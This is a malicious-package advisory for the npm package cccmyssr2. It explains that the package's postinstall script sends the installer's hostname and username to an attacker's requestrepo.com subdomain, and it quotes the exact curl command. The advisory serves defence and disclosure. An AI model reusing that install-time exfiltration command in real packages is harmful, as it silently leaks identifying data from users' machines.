VYPR

npm · Malicious package advisory

Malware

cccmyssr2

MAL-2026-6391

Malicious code in cccmyssr2 (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03)
On `npm install`, the package's postinstall.js executes `curl "http://r1x55270.requestrepo.com/pre?h=$(hostname)&u=$(whoami)"`, transmitting the installer's hostname and username over plain HTTP to an attacker-controlled requestrepo.com subdomain (a known DNS/HTTP exfiltration canary service). The package otherwise has no real functionality: index.js is a trivial 3-line date stub, package.json carries placeholder metadata ("A harmless utility package", empty author). The lifecycle hook fires automatically during install without consent, leaking host identifiers to a third party. This is the standard install-time reconnaissance/exfiltration shape.

Compromised versions (1)

  • 1.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.